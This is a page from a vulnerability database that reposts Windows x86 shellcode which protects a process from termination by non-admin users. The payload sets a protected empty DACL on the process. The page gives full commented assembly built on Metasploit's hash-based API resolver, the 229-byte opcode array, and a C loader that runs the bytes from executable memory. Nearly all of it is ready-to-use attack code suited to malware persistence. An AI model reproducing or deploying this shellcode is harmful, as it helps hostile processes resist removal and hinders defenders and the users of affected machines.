Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Windows/x86 - Protect Process Shellcode (229 bytes)

🗓️ 17 Feb 2017 00:00:00Reported by Ege BalciType 
zdt
 zdt🔗 0day.today👁 22 Views

Shellcode to protect process from termination by non-admin user

Code
/*
 
# Win32 - Protect Process Shellcode
# Date: [17.02.2017]
# Author: [Ege Balcı]
# Tested on: [Win 7/8/8.1/10]
 
This shellcode sets the SE_DACL_PROTECTED flag inside security descriptor structure, 
this will prevent the process being terminated by non administrative users.
 
-----------------------------------------------------------------
 
[BITS 32]
[ORG 0]
 
;   EAX-> Return Values
;   EBX-> Process Handle
;   EBP-> API Block
;   ESI-> Saved ESP
 
    pushad              ; Save all registers to stack
    pushfd              ; Save all flags to stack
 
    push esp            ; Push the current esp value
    pop esi             ; Save the current esp value to ecx
 
    cld                 ; Clear direction flags
    call Start          
 
%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project
 
Start:
    pop ebp             ; Pop the address of SFHA
 
    push 0x62C64749     ; hash(kernel32.dll, GetCurrentProcessId())
    call ebp            ; GetCurrentProcessId()
 
    push eax            ; Process ID
    push 0x00000000     ; FALSE
    push 0x1F0FFF       ; PROCESS_ALL_ACCESS
    push 0x50B695EE     ; hash(kernel32.dll, OpenProcess)
    call ebp            ; OpenProcess(PROCESS_ALL_ACCESS,FALSE,ECX)
    mov ebx, eax        ; Move process handle to ebx
 
 
    push 0x00000000     ; 0,0
    push 0x32336970     ; pi32
    push 0x61766461     ; adva 
    push esp            ; Push the address of "advapi32" string
    push 0x0726774C     ; hash(kernel32.dll, LoadLibraryA)
    call ebp            ; LoadLibraryA("advapi32")
 
    push 0x00503a44     ; "D:P"
    sub esp,4           ; Push the address of "D:P" string to stack
     
    push 0x00000000     ; FALSE
    lea eax, [esp+4]    ; Load the address of 4 byte buffer to EAX
    push eax            ; Push the 4 byte buffer address
    push 0x00000001     ; SDDL_REVISION_1 
    lea eax, [esp+16]   ; Load the address of "D:P" string to EAX
    push eax            ; Push the EAX value
    push 0xDA6F639A     ; hash(advapi32.dll, ConvertStringSecurityDescriptorToSecurityDescriptor)
    call ebp            ; ConvertStringSecurityDescriptorToSecurityDescriptor("D:P",SDDL_REVISION_1,FALSE) 
 
    push 0x00000004     ; DACL_SECURITY_INFORMATION
    push ebx            ; Process Handle
    push 0xD63AF8DB     ; hash(kernel32.dll, SetKernelObjectSecurity)
    call ebp            ; SetKernelObjectSecurity(ProcessHandle,DACL_SECURITY_INFORMATION,SecurityDescriptor)
     
    mov esp,esi         ; Restore the address of esp
    popad               ; Popback all registers
    popfd               ; Popback all flags
    ret                 ; Return
 
 
*/
 
 
//>Special thanks to Yusuf Arslan Polat ;D
#include <windows.h>
#include <stdio.h>
 
unsigned char Shellcode[] = {
  0x60, 0x9c, 0x54, 0x5e, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
  0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52,
  0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c,
  0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2,
  0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78,
  0xe3, 0x48, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49,
  0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac,
  0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8,
  0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66,
  0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01,
  0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff,
  0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x49, 0x47,
  0xc6, 0x62, 0xff, 0xd5, 0x50, 0x6a, 0x00, 0x68, 0xff, 0x0f, 0x1f, 0x00,
  0x68, 0xee, 0x95, 0xb6, 0x50, 0xff, 0xd5, 0x89, 0xc3, 0x6a, 0x00, 0x68,
  0x70, 0x69, 0x33, 0x32, 0x68, 0x61, 0x64, 0x76, 0x61, 0x54, 0x68, 0x4c,
  0x77, 0x26, 0x07, 0xff, 0xd5, 0x68, 0x44, 0x3a, 0x50, 0x00, 0x83, 0xec,
  0x04, 0x6a, 0x00, 0x8d, 0x44, 0x24, 0x04, 0x50, 0x6a, 0x01, 0x8d, 0x44,
  0x24, 0x10, 0x50, 0x68, 0x9a, 0x63, 0x6f, 0xda, 0xff, 0xd5, 0x6a, 0x04,
  0x53, 0x68, 0xdb, 0xf8, 0x3a, 0xd6, 0xff, 0xd5, 0x89, 0xf4, 0x61, 0x9d,
  0xc3
};
 
 
 
int main(int argc, char const *argv[])
{
    char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(BUFFER, Shellcode, sizeof(Shellcode));
    (*(void(*)())BUFFER)(); 
 
    printf("This process is protected !");
    getchar();
 
    return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Feb 2017 00:00Current
0.3Low risk
Vulners AI Score0.3
windows/x86protect process shellcodesecurity descriptor
22